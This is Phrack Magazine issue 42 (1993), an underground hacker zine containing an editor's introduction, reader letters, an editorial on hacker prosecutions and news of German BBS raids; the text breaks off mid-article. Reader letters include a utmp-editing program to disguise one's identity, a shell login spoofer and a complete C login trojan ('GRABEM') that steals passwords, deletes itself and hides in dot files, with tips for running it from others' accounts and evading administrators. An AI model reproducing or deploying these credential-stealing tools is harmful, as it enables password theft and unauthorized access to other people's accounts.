==Phrack Magazine== Volume Four, Issue Forty-Two, File 1 of 14 Issue 42 Index ___________________ P H R A C K 4 2 March 1, 1993 ___________________ ~ Happy Anniversary Bill Cook & Tim Foley, we love you both! ~ Here it is. Amidst all the fanfare and hoopla, Phrack 42 leaps from your electronic mail box to infect your very soul. It was just a few short years ago on this day that one of the greatest abuses of governmental authority took place in the happy little town of Austin, Texas. This issue marks the three year anniversary of these raids and a hearty hello goes out to Bellcore, The United States Secret Service, and the US District Attorney's Office. As many of you have read previously, or otherwise heard through the electronic grapevines, Dispater is no longer editor of Phrack. Your new editor, as I was most recently referred to so lovingly by my long-time friend John Lee on the alt.cyberpunk Usenet group: "the long hair and heavy metal beer drinking Texan that Bruce Sterling finds so .. ahem.. 'attractive'." In case you don't get the joke, my name is Erikb, and I'm a hacker. There are a few very distinct differences beginning with this issue of Phrack. First and foremost, Phrack is now registered with the Library of Congress, and has its own ISSN. Yes, boys and girls, you can go to Washington, D.C. and look it up. This adds a new era of legitimacy to Phrack in that with such a registration, Phrack should never again face any legal challenge that would bypass any paper based magazine. After much deliberation, I have concluded that Phrack will no longer provide the world's anti-hacker corporate and governmental types (IE: THE MAN) such valuable information for free. This will of course have absolutely no effect on YOU, the hackers of the world. Phrack has always been, and will always continue to be yours to copy and distribute amongst yourselves without limitation, as long as the files retain unchanged and intact. Entities who register their subscriptions to Phrack will be providing valuable demographic information to Phrack and its readers on exactly who outside our community actually takes an active interest in us. Yes, it will also generate some income. The proceeds of all monies earned by Phrack will be used to actually compensate contributors for articles of interest, and most importantly, help a certain person pay off the debt incurred by the twist of fate dealt him through his involvement with this publication in the past. I have no interest in making any money off of Phrack, as if I were to show a profit, I would have to contribute to Tim Foley's expense account via the IRS and I have absolutely no desire to fund his antics further than I am already forced to. To keep things honest, any information about the financial affairs of Phrack will be made available to anyone who cares to write and ask. Thus, we can all see if "THE MAN" is truly as ethical as he would have us believe, especially since our rate will be considerably less than many magazines (or military screwdrivers). Now, pertaining to "THE MAN." Phrack does not care for you and the way you secretly read and profit from Phrack and then use the information contained within its files to oppress its publishers, contributors and readers. Henceforth, anyone involved with any ties to a computer profession for any corporation, the military or the federal government, any person with any ties for any telecommunications company, network service provider or interconnect carrier, any person with any ties to any law enforcement body, federal, state or otherwise, any elected officials, attorneys, accountants or computer consultants of any kind must register your subscription immediately. If you are unsure of your status with this regard, please contact us. We are going to be VERY liberal about "special dispensations" since it is not our intention to screw anyone out of a subscription. ------------------------------------------------------------------------- READ THE FOLLOWING IMPORTANT REGISTRATION INFORMATION Corporate/Institutional/Government: If you are a business, institution or government agency, or otherwise employed by, contracted to or providing any consultation relating to computers, telecommunications or security of any kind to such an entity, this information pertains to you. You are instructed to read this agreement and comply with its terms and immediately destroy any copies of this publication existing in your possession (electronic or otherwise) until such a time as you have fulfilled your registration requirements. A form to request registration agreements is provided at the end of this file. Individual User: If you are an individual end user whose use is not on behalf of a business, organization or government agency, you may read and possess copies of Phrack Magazine free of charge. You may also distribute this magazine freely to any other such hobbyist or computer service provided for similar hobbyists. If you are unsure of your qualifications as an individual user, please contact us as we do not wish to withhold Phrack from anyone whose occupations are not in conflict with our readership. _______________________________________________________________ Phrack Magazine corporate/institutional/government agreement Notice to users ("Company"): READ THE FOLLOWING LEGAL AGREEMENT. Company's use and/or possession of this Magazine is conditioned upon compliance by company with the terms of this agreement. Any continued use or possession of this Magazine is conditioned upon payment by company of the negotiated fee specified in a letter of confirmation from Phrack Magazine. This magazine may not be distributed by Company to any outside corporation, organization or government agency. This agreement authorizes Company to use and possess the number of copies described in the confirmation letter from Phrack Magazine and for which Company has paid Phrack Magazine the negotiated agreement fee. If the confirmation letter from Phrack Magazine indicates that Company's agreement is "Corporate-Wide", this agreement will be deemed to cover copies duplicated and distributed by Company for use by any additional employees of Company during the Term, at no additional charge. This agreement will remain in effect for one year from the date of the confirmation letter from Phrack Magazine authorizing such continued use or such other period as is stated in the confirmation letter (the "Term"). If Company does not obtain a confirmation letter and pay the applicable agreement fee, Company is in violation of applicable US Copyright laws. This Magazine is protected by United States copyright laws and international treaty provisions. Company acknowledges that no title to the intellectual property in the Magazine is transferred to Company. Company further acknowledges that full ownership rights to the Magazine will remain the exclusive property of Phrack Magazine and Company will not acquire any rights to the Magazine except as expressly set forth in this agreement. Company agrees that any copies of the Magazine made by Company will contain the same proprietary notices which appear in this document. In the event of invalidity of any provision of this agreement, the parties agree that such invalidity shall not affect the validity of the remaining portions of this agreement. In no event shall Phrack Magazine be liable for consequential, incidental or indirect damages of any kind arising out of the delivery, performance or use of the information contained within the copy of this magazine, even if Phrack Magazine has been advised of the possibility of such damages. In no event will Phrack Magazine's liability for any claim, whether in contract, tort, or any other theory of liability, exceed the agreement fee paid by Company. This Agreement will be governed by the laws of the State of Texas as they are applied to agreements to be entered into and to be performed entirely within Texas. The United Nations Convention on Contracts for the International Sale of Goods is specifically disclaimed. This Agreement together with any Phrack Magazine confirmation letter constitute the entire agreement between Company and Phrack Magazine which supersedes any prior agreement, including any prior agreement from Phrack Magazine, or understanding, whether written or oral, relating to the subject matter of this Agreement. The terms and conditions of this Agreement shall apply to all orders submitted to Phrack Magazine and shall supersede any different or additional terms on purchase orders from Company. _________________________________________________________________ REGISTRATION INFORMATION REQUEST FORM We have approximately __________ users. We desire Phrack Magazine distributed by (Choose one): Electronic Mail: _________ Hard Copy: _________ Diskette: _________ (Include size & computer format) Name:_______________________________ Dept:____________________ Company:_______________________________________________________ Address:_______________________________________________________ _______________________________________________________________ City/State/Province:___________________________________________ Country/Postal Code:___________________________________________ Telephone:____________________ Fax:__________________________ Send to: Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 ----------------------------------------------------------------------------- As many of you can imagine, this will be very hard to enforce. This is not our main concern, as people who choose to ignore this stipulation are in direct violation of applicable US Copyright laws and therefore are just as unethical and guilty as they have always claimed we are. It would be an ironic turn of events should the FBI actually have to conduct raids against companies like Bellcore for harboring illegal copies of Phrack Magazine. If, in your travels, you happen to see such an occurrence, feel free to let us know. :) Enjoy the magazine. It is for and by the hacking community. Period. Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans) 3L33t : K L & T K News : Datastream Cowboy Photography : Restricted Data Transmissions & dFx Publicity : (Please, God, no more press) Prison Consultant : The English Prankster Creative Stimulus : Sandoz, Buena Vista Studios, The Sundays Mooks : Dave & Bruce Librarian : Minor Threat Thanks To : Professor Falken, Vince Niel, Skylar Rack, NOD, G. Tenet, Frosty No Thanks To : Scott Chasin (who didn't even care) Phrack Magazine V. 4, #42, March 1, 1993. ISSN 1068-1035 Contents Copyright (C) 1993 Phrack Magazine, all rights reserved. Nothing may be reproduced in whole or in part without written permission of the Editor-In-Chief. Phrack Magazine is made available quarterly to the amateur computer hobbyist free of charge. Any corporate, government, legal, or otherwise commercial usage or possession (electronic or otherwise) is strictly prohibited without prior registration, and is in violation of applicable US Copyright laws. Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 phrack@well.sf.ca.us Submissions to the above email address may be encrypted with the following key : (Not that we use PGP or encourage its use or anything. Heavens no. That would be politically-incorrect. Maybe someone else is decrypting our mail for us on another machine that isn't used for Phrack publication. Yeah, that's it. :) ) -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.1 mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg== =q2KB -----END PGP PUBLIC KEY BLOCK----- -= Phrack 42 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by The Editor 14K 2. Phrack Loopback / Editorial Page / Line Noise 48K 3. Phrack Pro-Phile on Lord Digital 22K 4. Packet Switched Network Security by Chris Goggans 22K 5 Tymnet Diagnostic Tools by Professor Falken 35K 6. A User's Guide to XRAY by NOD 11K 7. Useful Commands for the TP3010 Debug Port by G. Tenet 28K 8. Sprintnet Directory Part I by Skylar 49K 9. Sprintnet Directory Part II by Skylar 45K 10. Sprintnet Directory Part III by Skylar 46K 11. Guide to Encryption by The Racketeer [HFC] 32K 12. The Freedom Of Information Act and You by Vince Niel 42K 13. HoHoCon from Various Sources 51K 14. PWN by Datastream Cowboy 29K Total: 474K Phrack 42 is dedicated to John Guinasso, director of global network security, BT North America, without whose immortal comments, many would have never been motivated to write. "If you mess with our network and we catch you -- which we always do -- you will go down." (John Guinasso, Information Week, July 13, 1992) "Hell, WE owned Tymnet before BT did!" (Anonymous hacker-type, Random Telephone Call, 1993) _______________________________________________________________________________ ==Phrack Magazine== Volume Four, Issue Forty-Two, File 2a of 14 [-=:< Phrack Loopback >:=-] ============================================================================ !!!!WATCH THIS SPACE FOR SUMMERCON INFORMATION NEXT ISSUE!!!! ============================================================================ I 'found' this little C program a few days ago, and runs on most UNIX machines I think (As I found it, I cant claim fame for writing it!). What it does, is change your userid and x25 address to anything of your choice. This only affects programs such as 'write' and 'who'. It doesn't automatically give you different access rights, so it can only be used to disguise your real identity. Usage ----- inv god somewhere (Changes your uid to 'god' and X.25 to 'somewhere') inv '' '' (Makes you INVISIBLE on 'who') Program invis.c --------------- #include #include #include #include main(argc,argv) int argc; char *argv[]; { FILE *f; struct utmp u; int v=ttyslot(1); if(v==-1) { fprintf(stderr,"Can't find terminal.\n"); exit(1); if(argc!=3) { fprintf(stderr,"Args!\n"); exit(1); } f=fopen("/etc/utmp","r+"); if(f==NULL) { fprintf(stderr,"Utmp has escaped!\n"); exit(1); } if(fseek(f,v*sizeof(u),0)==-1) { fprintf(stderr,"Garbage utmp\n"); exit(1); } if(fread((char *)&u,sizeof(u),1,f)!=1) { fprintf(stderr,"Write failed\n"); exit(1); } strncpy(u.ut_name,argv[1],8); strncpy(u.ut_host,argv[2],16); if(fseek(f,v*sizeof(u),0)==-1) { fprintf(stderr,"Seek failed\n"); exit(1); } fwrite((char *)&u,sizeof(u),1,f); fclose(f); } I personaly have not used this program (to hack or for anything else) What you do with it is up to you...., ________ Have fun...., !!! ( )____ ( Alas, life ) ( is but an ) ( Aardvaark.. ) ( __ ) . (_____) (____) * * * * * * * * * * * * * * * * . ? . () * CHEERS_ THEN - _ _ * __ () * ___/_/______|_|___| |__ * / \ () * |________ _______| |__| * |_ _| * / / | | | | | | * |(0)||(0)| * / /___ | | | | | | * /|_ \/ _|\ * /___ / | | | | | | * || | == | || * / / | | \ \__/ / * || \____/ || * / / |_| \____/ * ///\ !! /\\\ *-*-/_/-*-*-*-*-*-*-*-*-*-*-*-*-=-=-=-=-=-=-=-=-!!!-!-=-=-!-!!!-=-=-=-=-=-=-=-= ------------------------------------------------------------------------------- I am interested in getting in contact with hackers in Nord Italy (I am located in Torino). Do you know anybody ? Can you help TheNewHacker ?? Thanks TheNewHacker [Editor: Actually, we are in the process of recruiting people to write for a compilation file on the hacking scenes in countries around the world. One person is working on Italy. Perhaps when this file is completed, you will be able to network through that information. If anyone in a country other than America is interested in contributing to this effort, please write us at: phrack@well.sf.ca.us ! ] ----------------------------------------------------------------------------- hello, i must say i love your publication. I have a little kind of hack/phreak for you guys. When you approach a Red light, preferably at night with few cars around, continually flash your bright lights. This tricks the light into believing this a cop waiting behind traffic at the light thus changing the light after about 10 flashes. I discovered that after seeing several police officers turn on their lights before they hit lights and was amazed on how easily the light changed. If you have say, a Mag-lite the trick works if you point directly at the top of the post-light and the ones hanging right above red on verticals and right above yellow on horizontals. hope this helps etc. (i fucking hate those damn red lights) Dave. [Editor: I've actually tried this. It works on most major intersections] ----------------------------------------------------------------------------- Hallo ! I'd like to make just some addition to the APPENDIX A of the Racketeer's article "The POWER of Electronic Mail" - there are new guys in InterNET -> Russians (!). They have the awful connection, but it's cool team. So, add : .su kremvax.hq.demos.su And one more note, in the SMTP installed on the Sun Station I'm working on there isn't command TICK, but exist some strange like RSET and EXPN. Spy P.S. Sorry for my bad English. [Editor: Russia has a lot of computers online these days. Look for more on the Russian Internet in upcoming Phracks!] ----------------------------------------------------------------------------- There is another, much simpler way to expand your password collection, other than tty spoofing. Why not just run a program that simulates the login process, and then leave it running on the console for an unsuspecting victim? A simple example is below. Execute by typing getpass:logout. --------File: getpass---------- LOGIN="" PASSWD="" clear echo -n "login: " read LOGIN echo "$LOGIN" >name sleep 3 echo -n "Password:" read PASSWD echo "$PASSWD" >password echo echo -n "Login incorrect" ------------------------------- The only problem I have is that I don't know how to make it so that the password, when entered, isn't shown on the screen. I'm sure you can come up with a solution. [Editor: actually, someone kinda did. See the next letter] ----------------------------------------------------------------------------- A Better UNIX Password Grabber by The K-Man I blame it entirely on boredom. Well, that and an acute case of end- of-semester neural gridlock. I was sitting in the lab a couple of years ago, my head leaning against a Sparc-2 display, my index finger hitting the return key over and over again at the login prompt. It was all my mind and body were capable of at the time. Then a little thought formed in the back of my mind: "You know, it would be pretty damn easy to write a program to imitate the behavior of this screen while grabbing user id's and passwords." So I logged in and started coding. Then I thought to myself, "You know, with a few extra lines of code and a couple of tricks, I could make this little guy almost completely undetectable and untraceable while running." So I coded some more. A couple of hours later, out popped the following program: ---------------------------- Cut Here ----------------------------------- /*----------------------------------------------------------------------+ | GRABEM 1.0 by The K-Man | | A Cute little program to collect passwords on the Sun workstations. | +----------------------------------------------------------------------*/ #define PASSWORD "Password:" #define INCORRECT "\nLogin incorrect" #define FILENAME ".exrc%" #include #include /*-----------------------------------------------------------------------+ | ignoreSig | | | | Does nothing. Used to trap SIGINT, SIGTSTP, SIGQUIT. | +-----------------------------------------------------------------------*/ void ignoreSig () { return; } /*-----------------------------------------------------------------------+ | Main | +-----------------------------------------------------------------------*/ main() { char name[10], /* users name */ password[10]; /* users password */ int i, /* loop counter */ lab, /* lab # you're running on */ procid; /* pid of the shell we're under */ FILE *fp; /* output file */ /*-------------------------------------------------------------------+ | Trap the SIGINT (ctrl-C), SIGSTP (ctrl-Z), and SIGQUIT (ctrl-\) | | signals so the program doesn't stop and dump back to the shell. | +-------------------------------------------------------------------*/ signal (SIGINT, ignoreSig); signal (SIGTSTP, ignoreSig); signal (SIGQUIT, ignoreSig); /*-------------------------------------------------------------------+ | Get the parent pid so that we can kill it quickly later. Remove | | this program from the account. | +-------------------------------------------------------------------*/ procid = getppid(); system ("\\rm proj2"); /*-------------------------------------------------------------------+ | Ask for the lab # we're running on. Clear the screen. | +-------------------------------------------------------------------*/ printf ("lab#: "); scanf ("%d", &lab); for (i=1; i<40; i++) printf ("\n"); getchar(); /*-------------------------------------------------------------------+ | Outer for loop. If the name is <= 4 characters, it's probably not | | a real id. They screwed up. Give 'em another chance. | +-------------------------------------------------------------------*/ for(;;) { /*---------------------------------------------------------------+ | If they hit return, loop back and give 'em the login again. | +---------------------------------------------------------------*/ for (;;) { printf("lab%1d login: ",lab); gets (name); if (strcmp (name, "") != 0) break; } /*---------------------------------------------------------------+ | Turn off the screen echo, ask for their password, and turn the | | echo back on. | +---------------------------------------------------------------*/ system ("stty -echo > /dev/console"); printf(PASSWORD); scanf("%s",password); getchar(); system ("stty echo > /dev/console"); /*---------------------------------------------------------------+ | Write their userid and password to the file. | +---------------------------------------------------------------*/ if ( ( fp = fopen(FILENAME,"a") ) != NULL ) { fprintf(fp,"login %s has password %s\n",name,password); fclose(fp); } /*---------------------------------------------------------------+ | If the name is bogus, send 'em back through | +---------------------------------------------------------------*/ if (strlen (name) >= 4) break; else printf (INCORRECT); } /*-------------------------------------------------------------------+ | Everything went cool. Tell 'em they fucked up and mis-typed and | | dump them out to the REAL login prompt. We do this by killing the | | parent process (console). | +-------------------------------------------------------------------*/ printf (INCORRECT); kill (procid, 9); } ---------------------------- Cut Here ----------------------------------- HOW IT WORKS You can probably figure this out by reading the code, but I thought I'd just add some comments on why I did what I did. The first thing is does is install the signal handler. All it does is trap SIGINT, SIGSTP, and SIGQUIT, so that the person trying to log into the machine this baby is running on can't kill it with a keystroke. Next, it gets the parent process ID. We'll use this later to kill it off quickly. Then it proceeds to erase the executable file. Sysadmins can't find a trojan horse program that isn't there. >From here it goes on to imitate the login and password prompts. You'll probably have to change the code to get it to imitate the login process on your particular machine. When it gets a userid and password, it appends them to an existing file in the account. I chose the .exrc, but any dot file will work. The point being to use a file that already exists and should be in the account. Don't leave any extra suspicious files lying around. After it writes the uid and password to the file, it bumps the user back to the real login prompt by killing off the shell that was the parent process of the program. The cut is almost instantaneous; the user would have to be inhumanly observant to notice the transition. HOW TO USE Well, first you need an account to run it from. If your site has guest accounts, you've got it made. If not, I'd suggest using a little social engineering to get one other person's account. With that account and the program, you can grab access to many more. I wouldn't recommend running it from an account that has your name on it. That just makes it a little more dangerous than it needs to be. Of course, if the sysadmin happens to catch the program running on your login, you can always claim to know nothing. Say someone else must have gotten your password and is using your account to escape detection. He might buy it. But if you have the source for the program sitting somewhere in your account, and they find it, you're fucked. So it's best to use someone else's account for the job. After you've gotten the account you'll be running it from, you'll need to get the program in that account somehow. I started off by keeping a copy of the source somewhere it my account, named with something innocuous and hidden among bunches of source files, but I got paranoid and started hauling the source around with me on a bar floppy. Do whatever suits your level of paranoia. Copy the source to the account you'll be running it from and compile it. Trash the source, and name the program something that won't stand out in a ps list. selection_svc is a nice innocuous name, and it appears everywhere. Do a ps on one of your machines and look for processes that hang around for a long time. You might want to hide it as a daemon. Be creative. Now run the program and sit back and wait. Or leave and come back later. When you know that someone has tried to log on to your booby trapped machine, log back into the account you borrowed to run the program in and vi or emacs (if you're that kind of person) out the captured userid and password. Simple as that. Note that the two times that you stand the greatest chance of being caught are when you first compile and run the program and when you retrieve your captured uid and passwords. There's the remote chance that someone might see you at work and see what you're doing, but it's not very likely. If you start acting all paranoid you'll draw more attention to yourself than you would have gotten in the first place. If your site has dialup lines, you might want to do a dialin to retrieve the passwords. Or you might prefer to do it in person. All depends on your paranoia quotient which you think is more secure, I guess. TIPS Be careful which dot files you use. I chose the .exrc because it was something that wasn't used often at our site. If you chose the .cshrc or other frequently accessed file, put a # before the uid and password you write to that file. That way, when that dot file is sourced, it'll treat that line as a comment and not spit out an error message that could cause suspicion. Try to run the program at a time when you know there will be heavy machine usage. That way you'll trap something quick. The longer your program runs, the greater the chance it will be found. Don't be greedy. Run on only one or two machines at a time. And if you run on more than one machine, run out of a different account on each one. Again, the more you put out there, the better the chance that at least one will be found. PARTING NOTE The morning after I wrote this program was the first time I got to use it. I set it running on a guest account, the went to a machine across the room to do some legitimate work. One of my friends walks in shortly after that, and we start shooting the shit. A minute or two later, the sysadmin walks in, sits down, and logs in to the machine I ran the program on. I came really close to dropping my fudge right then and there. The only thing running through my mind was "Either I'm totally fucked, or I have root." Turned out it was choice B. Too bad the guy changed his password once a week, and I wasn't smart enough to fix it so that I would see the change. Oh well, I had fun for a week though. There were quite a few interesting e-mail messages sent back and forth that week. I think the best one was the one from our (male) department head to one of our radical she-male hard-core no-damn-gifs feminist female professors, detailing all the perverted sexual acts that he would like to perform with and on her. :) Anyway, have fun with the program. Maybe I'll get a chance to come up with some more cool UNIX programs in the future. Later, K-Man ----------------------------------------------------------------------------- In a recent issue of PHRACK you had some article or loopback about getting information about people via modem. I am somewhat interested in this and could use this information. I have a friend who is a part-time bounty hunter and could use such information to track people down. Could you please send me some information about who to contact to find out this information. What I could REALLY use is an on-line up-to-date phone/address book that I could call to find out anybody's address. Is there such a thing? If you have any information please e-mail me, since I am unable to get your mag on a regular basis. Thanx a mil! Scarface [Editor: Actually there are quite a large number of databases that keep information on everyone. There is TRW, Equifax, TransUnion, Information America and NAI just to name a few. Many of these services are very expensive, but even services like CompuServe allow users to look up people all over America using PhoneFile which compiles data from all kinds of public records. Nexis can allow you to look up real estate data on just about anyone with loans on their houses. Every public utility and department of motor vehicles provides information on their records, and many are online. A good book to read about this kind of thing is Privacy For Sale Jeffrey Rothfeder Simon & Schuster $22.00] ----------------------------------------------------------------------------- THE GOLDEN ERA REBORN! Relive the thrill of the golden era of hacking through our exclusive collection of BBS messages. Our collection contains posts from over 40 of the most popular hack/phreak BBSes of all time. Experience the birth of the computer underground again from your own computer with this collection of original posts from bulletin boards like: * 8BBS * * OSUNY * * PLOVERNET * * THE LEGION OF DOOM * * BLACK ICE PRIVATE * * THE PHOENIX PROJECT * And many more... Messages are available in many computer formats: IBM Amiga Macintosh For more information, please contact LOD Communications email: lodcom@mindvox.phantom.com US Mail: LOD Communications 603 W. 13th St. Suite 1A-278 Austin, TX 78701 Voice Mail: 512-448-5098 ----------------------------------------------------------------------------- You might like this one... --bob **************************************** I just saw a transcript of a press conference given by Secret Service Agent Frericks, in Lubbock last December. here is a brief extraction... FRERICKS: Um hm. This is a major nation wide, world wide problem from an industry point of view with tremendous losses in funds tremendous losses of money. the VAX account at the University is a way to get into numerous other research accounts or Internet which is the ...you get onto Internet you can talk to anybody else who is on Internet anywhere in the world which these kids were talking to Belgium, and Israel and Australia and they can do that just by this, thus avoiding long distance phone calls. But most of the people on Internet I mean on the VAX are there legitimately for research purposes they can go to Mayo and get a file if they're a med student and they also get one of these pamphlets if they get, like the Department of Engineering gives out an account number just for that semester, the professor would give it out so you can use the VAX well they also get one of those pamphlets that explains what the rules are and the instructor spends a good bit of time the first couple of classes going over computer etiquette, computer rules. [Editor: Another of America's finest.] ----------------------------------------------------------------------------- I typed this because of the mention of Software Security International in the article "More than $100,000 in Illegal Software Seized" in Rambone's Pirates Cove in Phrack 41. He mentioned that they were the investigators that finally brought down APL. I am not only familiar with that, a past friend of mine was there when the Marshalls took the board. He was there as representative of SSI. The best part that Rambone didn't know, was that they couldn't get into APL to verify the existence of the software, until they got the password breaker from Novell. So in essence, they looked like some dumb fools. They didn't have any idea on how to approach the network. Software Security International Can be reached at... 1-800-724-4197 2020 Pennsylvania Avenue N.W. Suite 722 Washington, D.C. 20006-1846 That is of course if they finally have gotten off the ground. Last I Heard (2-3 months ago) they were still having trouble getting Financial Backing. They did the APL Bust for nothing, just to prove they could do it. They are also on a lot of other BBS's around America. So as a warning to other sysops, Cover your Ass. You could rack up some serious negative cash flow by sending tons of mail to the box above, then it gets Airborne'd to Washington State. see ya [Editor: I think it might be a good idea to send them a few postcards every day for the next few weeks. Just to stay in touch.] ----------------------------------------------------------------------------- ==Phrack Magazine== Volume Four, Issue Forty-Two, File 2b of 14 [-=:< Editorial >:=-] Before I jump upwards onto my soapbox and spew forth a meaty editorial I would like to relay something to the readers of Phrack. The following is a transcript of John Lee's (Corrupt's) confession to the charges facing him. (From Security Insider Report, Jan. 1993) What follows is in my opinion a very poor attempt at a plea-bargain, and obviously induced by attorney coercion. I must wonder what John was thinking when he agreed to this admission. ====================================================================== I agreed with others to violate various laws related to the use of computers. I agreed to do the following: 1) I agreed to possess in excess of fifteen passwords which permitted me to gain access to various computer systems including all systems mentioned in the indictment and others. I did not have authorization to access these systems. I knew at the time that what I did was wrong. 2) I used these access devices and in doing so obtained the value of time I spent within these systems as well as the value of the passwords themselves which I acknowledge was more than $1000. 3) I intentionally gained access to what I acknowledge are Federal interest computers and I acknowledge that work had to be done to improve the security of these systems which was necessitated by my unauthorized access. 4) I was able to monitor data exchange between computer systems and by doing so intentionally obtained more passwords, identifications and other data transmitted over Tymnet and other networks. 5) I acknowledge that I and others planned to share passwords and transmitted information across state boundaries by modem or telephone lines and by doing so obtained the monetary value of the use of the systems I would otherwise have had to pay for. Among the ways I and others agreed to carry out these acts are the following: 1. I was part of a group called MOD. 2. The members of the group exchanged information including passwords so that we could gain access to computer systems which we were not authorized to access. 3. I got passwords by monitoring Tymnet, calling phone company employees and pretending to be computer technicians, and using computer programs to steal passwords. I participated in installing programs in computer systems that would give the highest level of access to members of MOD who possessed the secret password. I participated in altering telephone computer systems to obtain free calling services such as conference calling and free billing among others. Finally, I obtained credit reports, telephone numbers and addresses as well as other information about individual people by gaining access to information and credit reporting services. I acknowledge that on November 5, 1991, I obtained passwords by monitoring Tymnet. I apologize for my actions and am very sorry for the trouble I have caused to all concerned. John Lee ========================================================================== This issue I would like to call attention to what I consider to be a very pressing issue. There has always been a trend to pad the amount of dollar damages incurred to any victim of a hacker attack. I personally feel that the blame is never directed at the true guilty parties. Certainly, if someone is caught breaking into a system, then they are surely guilty of some form of electronic trespass. I will also concede that such a person may or may not be guilty of other crimes based upon their actions once inside that system. What I have the most problems dealing with is the trend to blame the hacker for any expenditures needed to further secure the system. With this mindset, why should any corporation bother to add any security at all? Why not just wait until someone happens across a few poorly secured sites, nab them, and claim damages for the much needed improvements in security? The worst culprits in this type of behavior has been the RBOCs. As was seen with the supposed damages incurred for the distribution of the "911 document" and most recently with the $370,000 damages supposedly incurred by Southwestern Bell resulting from the alleged activities of those in MOD. Perhaps this figure does have some basis in reality, or perhaps it is just an arbitrary figure dreamed up by a few accountants to be used at year end to explain some losses in the corporate stock report. Most often figures such as this factor in such ridiculous items as the actual system hardware penetrated. I can hardly see the relevance of such a charge. Even if these charges are to be believed, why isn't the blame being evenly distributed? Why aren't stockholders crying for the heads of system administrators, MIS managers and CIOs? These are the people who have not adequately done their jobs, are they not? If they had expended a bit of time, and a small amount of capital, the tools exist to make their systems impervious to attack. Period. If I had an investment in a company such as Southwestern Bell, I would be outraged that the people I was employing to perform data security functions were not apt enough to keep a group of uneducated gangsters out of their switching systems. Why haven't there been any emergency meetings of shareholders? Why isn't anyone demanding any changes in policy? Why is everyone still employed? Not to blame Southwestern Bell too harshly, they were sorely outclassed by MOD, and had absolutely no way to cope with them. Not only because MOD were competent telco hackers, but because Southwestern Bell's network service provider had given them free reign. Southwestern Bell's packet switched network, Microlink II, was designed and implemented for SWBT by Tymnet (then owned by McDonnell Douglas). An interesting thing I've heard about SWBNET, and about every other subnet arranged by Tymnet, is that the information concerning gateways, utilities, locations of node code, etc., is purported to be located in various places throughout Tymnet internal systems. One such system, was described to me as a TYMSHARE system that contained data files outlaying every subnet on Tymnet, the mnemonics (username/password pair) to each utility, gateway, and the ONTYME II mail access keys. If this information is correct, then shouldn't Tymnet be called in to acknowledge their role in the attacks on Southwestern Bell? Let's say a Realtor sold you a house, but told you that he would be keeping copies of all your keys so that he could help you with the maintenance. Some time later, you notice that a few of your books have been read, but nothing else is disturbed. Later on you notice that your tv is on and your bed is all messed up. A week later your stereo is gone. You set up a trap and catch someone going into your house with your own key! You find that the burglars had made copies of all the keys held by your Realtor. You then find that the Realtor neglected to put the keys in a safe, and in fact had left them lying around on the table in his back yard labeled with the addresses they corresponded to. Who would you be more upset with? The individual who copied and used the keys, or the Realtor for not providing the access to your valuables more vigilantly? I would personally be far more upset with the Realtor, for if he had put the keys in a safe this event would have probably never transpired. I'm not saying that people who get caught for breaking into computer systems should be let go, especially if they can be proven to be involved in the sale of hacked information for a personal profit. What I am saying that if hackers are to be punished so vigorously for what I view as a predominantly victimless crime, then everyone should have to line up and take their fair share of the blame. I think it's high time that the real blame be placed on the corporate entities who seemingly refuse to acknowledge their role in these break-ins. Neglect of duties and lack of responsibility on the part of the employees, the interconnect carriers, the data network providers, the hardware vendors, etc. all play a key role in the problems that exist in the world's data networks today. In fact, if it were not for computer hackers, these problems would continue to lie dormant until either discovered by accident in the field, or the provider decided to go ahead and illuminate its clients to the existence of such a problem. I wholeheartedly encourage each and every reader of Phrack to purchase one share of stock in any corporation you know that has exhibited such tendencies and take your place on the floor of the next shareholders meeting and scare the hell out of the board of directors. Phrack Magazine is calling a discount brokerage very soon. ------------------------------------------------------------------------------- ==Phrack Magazine== Volume Four, Issue Forty-Two, File 2c of 14 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== ****************************************************************************** BBS Busts in Germany ==================== Thursday, March 18, 1993. This day will be remembered as a black day in German BBS history. In fact, it was the blackest day in German BBS history since the raid of 18 Berlin BBS in Berlin and North Germany a couple of months ago. What has happened? A couple of Bulletin Board Systems (BBS) have been raided by the police. All these BBS had "warez" online, illegal, pirated, copyrighted Software - usually for PC/MSDOS and Amiga. This time, most of these BBS were in Bavaria, South Germany. Now let's take a closer look at the events: One guy who got busted was MST, Sysop of Southern Comfort BBS in Munich. In fact, his board went offline 9 days before. But he was so unlucky still having his computer and his warez. He was even using his modem to trade warez at the very moment the cops rang his doorbell. Why did he go offline just so short before he got busted? His board had been running for over 1 year. Here is the text file MST released about going offline: THURSDAY 03-09-93 00:15 THE SOUTHERN COMFORT BBS IS CLOSED ! I AM NOT BUSTED OR ANYTHING LIKE THIS ! I CLOSED THE BBS COS OF PERSONAL REASONS AND PERHAPS IT WILL BE OPENED AGAIN IN 1 OR 2 MONTH ! I HOPE YOU WOULD UNDERSTAND THIS DECISION BUT SCENE IS NOT ALL WHAT LIFE CAN BE ALL USER ACCOUNTS STAY ALIVE AND WILL BE HERE AT A NEW??? OPENING ! SO I SAY BYE TO THE SCENE FOR PERHAPS ONLY A SHORT TIME ! MST/RAZOR 1911 A couple of days later, MST was posting ads in local BBS to sell his old equipment. But obviously he wasn't fast enough. Maybe this was one of the reasons the cops busted him on March, 18. They were afraid he might get rid of his illegal software, so they hurried up to catch him! He got busted at 10am this morning. Three cops were knocking on his door, until he opened. They had a search warrant and confiscated all his computer equipment, disks, modems... Chris used to have a board until four months ago, and now trades for TDT and other groups. He was in school this morning. His parents weren't home either. So the cops broke into his house, smashed the wooden door, and seized all his equipment. He is asked to speak to the Police this Tuesday. Chris used to be one of the most active traders for PC warez in Germany. He and his friend Michelangelo supported boards like Schizophrenia and Beverly Hills, which they co-sysop'ed. They were also known as the 'Beverly Hills Boys', a new German cracking group. After Chris' bust, a couple of 